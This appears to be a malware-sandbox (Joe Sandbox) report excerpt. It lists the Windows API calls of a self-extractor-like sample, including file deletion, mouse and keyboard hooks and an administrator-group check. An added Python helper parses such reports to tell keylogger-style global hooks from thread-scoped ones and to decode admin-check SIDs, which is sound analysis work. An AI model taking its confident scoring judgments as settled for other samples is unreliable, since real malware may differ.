                                                                            • Opcode Fuzzy Hash: 5da00d81305d43432be94bf511d636d1c0af40f6c688cac88fa34fe88ae8ac90
                                                                            • Instruction Fuzzy Hash: 92D0223230422029DA64393A0907AFF4C8C8F90361F00487FB804EA2C1ED7CCE81228D
                                                                            APIs
                                                                            • CloseHandle.KERNELBASE(00419858,?,0040C96A,00000000,?,0040C9B2,[@,80000000,?,?,?,0040C9D4,?,00419858,00000003,00000080), ref: 0040C899
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2962429428-0
                                                                            • Opcode ID: 260953eaa766690f6dd42752837e02fd8dd2a8d38b84a545f9bc6d2c9a71c262
                                                                            • Instruction ID: 46fd5d44533f688af1cbb16b01e3684df0873ba17e3ffd79ac6e97726efa63b3
                                                                            • Opcode Fuzzy Hash: 260953eaa766690f6dd42752837e02fd8dd2a8d38b84a545f9bc6d2c9a71c262
                                                                            • Instruction Fuzzy Hash: 53D0123220456186DA782F7CB8C45C237D96E56331331476BF0B6D72E4D3788C835A98
                                                                            APIs
                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,0040D8FF,?,?,?,004096BF,?), ref: 00402755
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 1d947fdf6df5f70e4621f0431d731520913ac8a11474ad35aa364c7fd2a883a0
                                                                            • Instruction ID: ef3627dbe8ede4864a94ca482c41f1f7a661cdc9e7d225e9ae9e2bc502ca7986
                                                                            • Opcode Fuzzy Hash: 1d947fdf6df5f70e4621f0431d731520913ac8a11474ad35aa364c7fd2a883a0
                                                                            • Instruction Fuzzy Hash: D5C0803014430079ED1137608E07B4936526B80716F50C465F344540F0D7F544005509

APIs
• VirtualFree.KERNELBASE(?,00000000,00008000,0040D8A7,00000000,?,0040D8F6,?,?,004096BF,?), ref: 00401D0C
Memory Dump Source
• Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
Similarity
• API ID: FreeVirtual
• String ID:
• API String ID: 1263568516-0
• Opcode ID: 6a62ac4a4d7dac27c13b63ea0cba825f676e2686878a6172cdbdd2a29a859d51
• Instruction ID: 1004f56851fc8b889ccfe642d75eb19623be02efc3220bf612975ac128c53eb9
• Opcode Fuzzy Hash: 6a62ac4a4d7dac27c13b63ea0cba825f676e2686878a6172cdbdd2a29a859d51
• Instruction Fuzzy Hash: 7FB09230544700FEEF224B00DE09B8A76A0ABC0B05F30C528B188641F087B56804EA09

APIs
• _wtol.MSVCRT ref: 00403882
• SHGetSpecialFolderPathW.SHELL32(00000000,?,DF20E863,00000000,00419828,00000000,0041981C), ref: 00403925
• ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00403996
• ??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 0040399E
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 004039A6
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?), ref: 004039AE
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?), ref: 004039B6
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 004039BE
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 004039C6
• _wtol.MSVCRT ref: 00403A1C
• CoCreateInstance.OLE32(00416E70,00000000,00000001,00416E30,00405712,.lnk,?,0000005C), ref: 00403ABD
• ??3@YAXPAX@Z.MSVCRT(?,0000005C), ref: 00403B55
• ??3@YAXPAX@Z.MSVCRT(?,?,0000005C), ref: 00403B5D
• ??3@YAXPAX@Z.MSVCRT(?,?,?,0000005C), ref: 00403B65
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0000005C), ref: 00403B6D
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,0000005C), ref: 00403B75
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,0000005C), ref: 00403B7D
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,0000005C), ref: 00403B85
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,0000005C), ref: 00403B8B
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0000005C), ref: 00403B93
Strings
Memory Dump Source
• Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
Similarity
• API ID: ??3@$_wtol$CreateFolderInstancePathSpecial
• String ID: .lnk
• API String ID: 408529070-24824748
• Opcode ID: 1948e0700340f48ec15fd9fe2690368c0dd61efe9497a1a1bad70624b13cca41
• Instruction ID: 6a4e2cb34307125d1aa254537a73282d765d300cba51a9a08192486ca10ed339
• Opcode Fuzzy Hash: 1948e0700340f48ec15fd9fe2690368c0dd61efe9497a1a1bad70624b13cca41
• Instruction Fuzzy Hash: 4DA18E71D10249ABDF14EFA1CC469EEBB78FF1430AF50442AF406B71A1DB389A42DB18

APIs
• GetLastError.KERNEL32(00000000,00000020,-00000002), ref: 004021D6
• wsprintfW.USER32 ref: 004021E7
• GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004021FC
• GetLastError.KERNEL32 ref: 00402201
• ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040221C
• GetEnvironmentVariableW.KERNEL32(?,00000000,00000004), ref: 0040222F
• GetLastError.KERNEL32 ref: 00402236
• lstrcmpiW.KERNEL32(00618E68,00404926), ref: 0040224B
• ??3@YAXPAX@Z.MSVCRT(00618E68), ref: 0040225B
• ??3@YAXPAX@Z.MSVCRT(00404926), ref: 00402279
• SetLastError.KERNEL32(?), ref: 00402282
• lstrlenA.KERNEL32(00416208), ref: 004022B6
• ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004022D1
• GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402303
• _wtol.MSVCRT ref: 00402314
• MultiByteToWideChar.KERNEL32(00000000,00416208,00000001,00618E68,00000002), ref: 00402334
Strings
Memory Dump Source
• Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
Similarity
• API ID: ErrorLast$??2@??3@EnvironmentVariable$ByteCharInfoLocaleMultiWide_wtollstrcmpilstrlenwsprintf
• String ID: 7zSfxString%d
• API String ID: 2117570002-3906403175
• Opcode ID: eb80ecc119c928046d4f48b44d1c37ea9d549868a3ac961d5216fb6842945394
• Instruction ID: 10ef73f62a445f8617660be723e0bbad3c81975cf04d4be1a7303cf9b6c1a78d
• Opcode Fuzzy Hash: eb80ecc119c928046d4f48b44d1c37ea9d549868a3ac961d5216fb6842945394
• Instruction Fuzzy Hash: 82518171900604EFDB219FB5DD59BDABBB9EB48350B10807EE64EE62D0D774AD40CB28

APIs
• GetModuleHandleW.KERNEL32(00000000), ref: 00401DD4
• FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401DF1
• FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401E05
• SizeofResource.KERNEL32(00000000,00000000), ref: 00401E16
• LoadResource.KERNEL32(00000000,00000000), ref: 00401E20
• LockResource.KERNEL32(00000000), ref: 00401E2B
• LoadLibraryA.KERNEL32(kernel32,SetProcessPreferredUILanguages), ref: 00401E57
• GetProcAddress.KERNEL32(00000000), ref: 00401E60
• wsprintfW.USER32 ref: 00401E7F
• LoadLibraryA.KERNEL32(kernel32,SetThreadPreferredUILanguages), ref: 00401E94
• GetProcAddress.KERNEL32(00000000), ref: 00401E97
Strings
Memory Dump Source
• Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
Similarity
• API ID: Resource$Load$AddressFindLibraryProc$HandleLockModuleSizeofwsprintf
• String ID: %04X%c%04X%c$SetProcessPreferredUILanguages$SetThreadPreferredUILanguages$kernel32
• API String ID: 2639302590-365843014
• Opcode ID: 8e2c376142790921a1b7bbf09f4a30eccecb8d2c9c1f9a6d1badee13c63417f8
• Instruction ID: f9dda1162ec2f24eaafa78ee80fe21c3398d892f55d41869619f642ebc926886
• Opcode Fuzzy Hash: 8e2c376142790921a1b7bbf09f4a30eccecb8d2c9c1f9a6d1badee13c63417f8
• Instruction Fuzzy Hash: B5214C72900608FBDB119FA4DC08FDF3ABDEB84711F158426FA05A6291D7B89D40CBA8

APIs
• wvsprintfW.USER32(?,00000000,?), ref: 00408DE3
• GetLastError.KERNEL32 ref: 00408DF4
• FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,00406B79), ref: 00408E1C
• FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,00406B79), ref: 00408E31
• lstrlenW.KERNEL32(?), ref: 00408E44
• lstrlenW.KERNEL32(?), ref: 00408E4B
• ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00408E60
• lstrcpyW.KERNEL32(00000000,?), ref: 00408E76
• lstrcpyW.KERNEL32(-00000002,?), ref: 00408E87
• ??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 00408E90
• LocalFree.KERNEL32(?), ref: 00408E9A
Memory Dump Source
• Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
Similarity
• API ID: FormatMessagelstrcpylstrlen$??2@??3@ErrorFreeLastLocalwvsprintf
• String ID:
• API String ID: 829399097-0
• Opcode ID: 70cd8bc1ebd143203d5f1bc79ab162f2f6f4eb1175f08b3b1613c25f11187359
• Instruction ID: c91527b0869a4d5de4249670dcf9d0912663d9707098e08fcc2f2580e19cfeee
• Opcode Fuzzy Hash: 70cd8bc1ebd143203d5f1bc79ab162f2f6f4eb1175f08b3b1613c25f11187359
• Instruction Fuzzy Hash: 41218176800208FFDB149FA0DD85DEB7BACEF44354B10807BF945A6190EF34AE858BA4

APIs
• FindFirstFileW.KERNEL32(?,?,004155D0,?,?,?,00000000), ref: 00402F15
• lstrcmpW.KERNEL32(?,004155CC,?,0000005C,?,?,?,00000000), ref: 00402F68
• lstrcmpW.KERNEL32(?,004155C4,?,?,00000000), ref: 00402F7E
• SetFileAttributesW.KERNEL32(?,00000000,?,0000005C,?,?,?,00000000), ref: 00402F94
• DeleteFileW.KERNEL32(?,?,?,00000000), ref: 00402F9B
• FindNextFileW.KERNEL32(00000000,00000010,?,?,00000000), ref: 00402FAD
• FindClose.KERNEL32(00000000,?,?,00000000), ref: 00402FBC
• SetFileAttributesW.KERNEL32(?,00000000,?,?,00000000), ref: 00402FC7
• RemoveDirectoryW.KERNEL32(?,?,?,00000000), ref: 00402FD0
• ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402FDB
• ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402FE6
Memory Dump Source
• Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
Similarity
• API ID: File$Find$??3@Attributeslstrcmp$CloseDeleteDirectoryFirstNextRemove
• String ID:
• API String ID: 1862581289-0
• Opcode ID: 839cb6fd099afb1d89a388e6f192fb9bcf45602aedd80242c8a3aefe3316d1c0
• Instruction ID: e3ea1660441bcf3a3f7f20395b47020d8d3d19c9c96888f58badb5dcc8a6e628
• Opcode Fuzzy Hash: 839cb6fd099afb1d89a388e6f192fb9bcf45602aedd80242c8a3aefe3316d1c0
• Instruction Fuzzy Hash: 7A218631A04209FBDB11AB71DD8DFEF3B7CAF44745F50407AB805B21D0EBB89A459A68

APIs
• GetCurrentThreadId.KERNEL32 ref: 0040864F
• SetWindowsHookExW.USER32(00000007,Function_00008576,00000000,00000000), ref: 0040865A
• GetCurrentThreadId.KERNEL32 ref: 00408669
• SetWindowsHookExW.USER32(00000002,Function_00008602,00000000,00000000), ref: 00408674
• EndDialog.USER32(?,00000000), ref: 0040869A
Memory Dump Source
• Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
Similarity
• API ID: CurrentHookThreadWindows$Dialog
• String ID:
• API String ID: 1967849563-0
• Opcode ID: 3c307380277fa9ea080ffec5c86f5ec4071e690be1bfbef556a541cbc554ab57
• Instruction ID: a1df587bc44f7b8848174d41fcc6ca6bf5c09d6170abc4bd78dad765c28a629c
• Opcode Fuzzy Hash: 3c307380277fa9ea080ffec5c86f5ec4071e690be1bfbef556a541cbc554ab57
• Instruction Fuzzy Hash: 93012671600218DFD3106B7AED44AB3F7ECEB85755B12843FE202921A0CAB79C008F6C

APIs
• AllocateAndInitializeSid.ADVAPI32(00406032,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,0000000A,-00000008,00406032,?,00000000,0000000A), ref: 00402487
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00402499
• FreeSid.ADVAPI32(?), ref: 004024A2
Memory Dump Source
• Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
Similarity
• API ID: AllocateCheckFreeInitializeMembershipToken
• String ID:
• API String ID: 3429775523-0
• Opcode ID: 61f8cf9d4fe0a411273f6da1a0187a3308019e8c7258d9cc8422d2cdfcfadd87
• Instruction ID: fcbafef67fd355d70295d2c1b6ce6e7585022550186800af39a78ba60eef4ec0
• Opcode Fuzzy Hash: 61f8cf9d4fe0a411273f6da1a0187a3308019e8c7258d9cc8422d2cdfcfadd87
• Instruction Fuzzy Hash: F7F03C72944288FEDB01DBE88D85ADEBF7CAB18304F8480AAA101A2182D2705704CB69
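Two of the listings above deserve a second look when scoring this sample, and both are easy to misread from the static argument values. In the hook-install function (call sites 0040865A and 00408674), idHook 7 is WH_MOUSE and 2 is WH_KEYBOARD, and each SetWindowsHookExW is immediately preceded by GetCurrentThreadId; that is the pattern of hooks scoped to the stub's own dialog thread, not the system-wide WH_KEYBOARD_LL (13) hook a keylogger installs. The 00000000 printed for dwThreadId is almost certainly an unresolved register value rather than a literal zero, because a WH_KEYBOARD hook with hMod = 0 and dwThreadId = 0 does not install at all. In the function at 00402487, nSubAuthorityCount = 2 with sub-authorities 0x20 and 0x220 decodes to S-1-5-32-544 (BUILTIN\Administrators) if the identifier authority at 00406032 is SECURITY_NT_AUTHORITY, and CheckTokenMembership with a NULL token tests the caller's own token: the standard IsUserAnAdmin-style check. The Python below is an added triage helper written for this page, not Joe Sandbox code. It parses report lines in the "Name.MODULE(args), ref: ADDR" form (SAMPLE_LINES is a constructed copy of the two listings) and applies both checks. The NT-authority value and the "preceding GetCurrentThreadId means thread scope" rule are assumptions, marked as such in the comments.

```python
import re
from dataclasses import dataclass

# Constructed sample input: the two API listings from this report, copied as the
# report prints them (hook installs at 0040865A/00408674, admin check at 00402487).
SAMPLE_LINES = """\
• GetCurrentThreadId.KERNEL32 ref: 0040864F
• SetWindowsHookExW.USER32(00000007,Function_00008576,00000000,00000000), ref: 0040865A
• GetCurrentThreadId.KERNEL32 ref: 00408669
• SetWindowsHookExW.USER32(00000002,Function_00008602,00000000,00000000), ref: 00408674
• EndDialog.USER32(?,00000000), ref: 0040869A
• AllocateAndInitializeSid.ADVAPI32(00406032,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,0000000A,-00000008,00406032,?,00000000,0000000A), ref: 00402487
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00402499
• FreeSid.ADVAPI32(?), ref: 004024A2
"""

# One report line: "• Name.MODULE(arg,arg,...), ref: ADDR" or "• Name.MODULE ref: ADDR"
LINE_RE = re.compile(
    r"^(?:•\s*)?(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

@dataclass
class ApiCall:
    name: str
    module: str
    args: list   # raw argument tokens as printed; "?" means the plugin could not resolve it
    ref: int     # address of the call site

def parse_calls(text):
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("name"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls

def arg_int(tok):
    """Arguments are printed as (signed) hex; '?' and symbolic names like Function_... are unknown."""
    if tok is None or not re.fullmatch(r"-?[0-9A-Fa-f]+", tok):
        return None
    return int(tok, 16)

# idHook values from WinUser.h
HOOK_NAMES = {2: "WH_KEYBOARD", 3: "WH_GETMESSAGE", 5: "WH_CBT", 7: "WH_MOUSE",
              13: "WH_KEYBOARD_LL", 14: "WH_MOUSE_LL"}

def classify_hooks(calls):
    """Decide, per SetWindowsHookEx call, whether the hook is system-wide or thread-scoped.
    Assumption: a GetCurrentThreadId call immediately before the install means its return
    value is the dwThreadId argument, even when the static listing prints 00000000 (a non-LL
    hook with hMod == 0 and dwThreadId == 0 would not install at all)."""
    out = []
    for i, c in enumerate(calls):
        if not c.name.startswith("SetWindowsHookEx"):
            continue
        id_hook = arg_int(c.args[0]) if c.args else None
        thread_id = arg_int(c.args[3]) if len(c.args) > 3 else None
        prev = calls[i - 1].name if i > 0 else ""
        if id_hook in (13, 14):
            scope = "global low-level"        # LL hooks are always system-wide
        elif (thread_id not in (None, 0)) or prev == "GetCurrentThreadId":
            scope = "thread-scoped"
        else:
            scope = "global"
        out.append((hex(c.ref), HOOK_NAMES.get(id_hook, f"idHook={id_hook}"), scope))
    return out

WELL_KNOWN_SIDS = {
    "S-1-5-32-544": "BUILTIN\\Administrators",
    "S-1-5-32-545": "BUILTIN\\Users",
    "S-1-5-18": "NT AUTHORITY\\SYSTEM",
}

def sid_from_alloc_call(call, authority=5):
    """Rebuild the SID string from AllocateAndInitializeSid(pAuthority, nSubAuthorityCount, sub0..sub7, ...).
    The listing shows only the address of the SID_IDENTIFIER_AUTHORITY (00406032), so the
    authority value is an assumption; 5 = SECURITY_NT_AUTHORITY is what admin checks use."""
    count = arg_int(call.args[1]) if len(call.args) > 1 else None
    if count is None or count < 1 or count > 8:
        return None
    subs = [arg_int(t) for t in call.args[2:2 + count]]
    if len(subs) != count or any(s is None for s in subs):
        return None
    return "S-1-%d-%s" % (authority, "-".join(str(s) for s in subs))

def find_admin_checks(calls, window=3):
    """Pair AllocateAndInitializeSid with a CheckTokenMembership within the next few calls.
    CheckTokenMembership(NULL, sid, &member) tests the token of the calling thread/process."""
    hits = []
    for i, c in enumerate(calls):
        if c.name != "AllocateAndInitializeSid":
            continue
        sid = sid_from_alloc_call(c)
        following = [d.name for d in calls[i + 1:i + 1 + window]]
        if sid and "CheckTokenMembership" in following:
            hits.append((hex(c.ref), sid, WELL_KNOWN_SIDS.get(sid, "unknown")))
    return hits

if __name__ == "__main__":
    calls = parse_calls(SAMPLE_LINES)
    for ref, hook, scope in classify_hooks(calls):
        print(f"{ref}: {hook} hook, {scope}")
    for ref, sid, name in find_admin_checks(calls):
        print(f"{ref}: membership check against {sid} ({name})")
```

On the two listings above this reports both hooks as thread-scoped WH_MOUSE / WH_KEYBOARD and the SID check as BUILTIN\Administrators. The same parser can be pointed at any "APIs" block of a Joe Sandbox report; a SetWindowsHookEx with idHook 13 or 14, or one with a non-zero dwThreadId that does not come from GetCurrentThreadId, is the case that should raise the score, not this one.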

Memory Dump Source
• Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b1df083afa2ec122568cef5a0170ccce4311ab5785baa6c9343831b33b0cc2ec
• Instruction ID: 1deff6650f640bb2d9dcab77f147087c60d03763b1f3dd6742a57df9d51469cf
• Opcode Fuzzy Hash: b1df083afa2ec122568cef5a0170ccce4311ab5785baa6c9343831b33b0cc2ec
• Instruction Fuzzy Hash: 5F022B72A043124BDB09CE28C59027DBBE2FBC4345F150A3EE89667BC4D7789954C7DA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e781e73348b070714efe4b9f1f387dbcbf5b044bf6c7f23a7a0004d2e0ca769a
                                                                            • Instruction ID: d276be45ba9710969d4d69a2fbd68599cb80de3b2bdcae4a446b37c04d3c8c9c
                                                                            • Opcode Fuzzy Hash: e781e73348b070714efe4b9f1f387dbcbf5b044bf6c7f23a7a0004d2e0ca769a
                                                                            • Instruction Fuzzy Hash: 6A41C360C14B9652EB134F7CC842272B320BFAB244F00D75AFDD179922FB3266446255
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e9ef0b0ca1b2f4f90659186b02398175d102153a1dce1c25c5b035dc35f82aa6
                                                                            • Instruction ID: 6fc8e050a97d926f750d5da14c4a761a5f22703977f0277d1b92a118b0bcd8c9
                                                                            • Opcode Fuzzy Hash: e9ef0b0ca1b2f4f90659186b02398175d102153a1dce1c25c5b035dc35f82aa6
                                                                            • Instruction Fuzzy Hash: 2F212E7B370D4607EB0C8939AE336BE2582E340346F88953DD247C5784EE9E9954810D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                                                            • Instruction ID: 593f74aba8cbd25357504dd2d18fce0fb38989f15731237b119c96727be92a00
                                                                            • Opcode Fuzzy Hash: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                                                            • Instruction Fuzzy Hash: 7521C53291462547CB02CE6EE4845A7F392FFC436BF174767ED8467290C629A85486E0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
